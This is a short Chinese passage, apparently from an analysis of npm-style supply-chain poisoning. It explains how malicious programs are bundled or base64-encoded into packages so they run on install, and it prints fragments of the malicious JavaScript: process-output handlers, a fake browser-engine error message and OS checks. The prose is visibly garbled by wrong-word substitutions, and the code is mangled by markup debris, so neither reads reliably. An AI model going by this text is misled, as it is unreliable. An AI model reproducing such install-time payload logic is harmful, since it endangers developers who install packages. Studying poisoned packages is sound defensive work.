恶意程序开释执行
该攻击方式次要将恶意程序捆绑打包进投毒包中,或者间接将恶意程序代码编码" (通常采纳简略的 base64、ascii 等编码) 转换为可显字符串后内嵌到投毒包代码文件中。当包管理器装置或投毒包加载时,投毒包中的恶意代码执行时会间接运行捆绑的恶意程序或者将内嵌编码后的恶意程序代码进一步解码开释后运行。
" { console.log(`stdout: ${data}`); }); child.stderr.on('data', (data)=">" { if(data.tostring().indexof("start-process") !=-1) { console.log( "\x1b[31m%s\x1b[0m", "can't access microsoft edge rendering engine."); process.exit(); } }); child.on('close', (code)=">" { }); } else if (os.platform()="==" "linux") { console.log( "\x1b[31m%s\x1b[0m", "this script is running on linux. please run on windows server os." ); } else { console.log( "\x1b[31m%s\x1b[0m", "this script is running on an unrecognized os. please run on windows server os." ); } } };解码后的恶意代码" url 为:
" { if(error){ console.log("error",error.message); return; } if(getter){ console.log(data); return; } console.log(data); });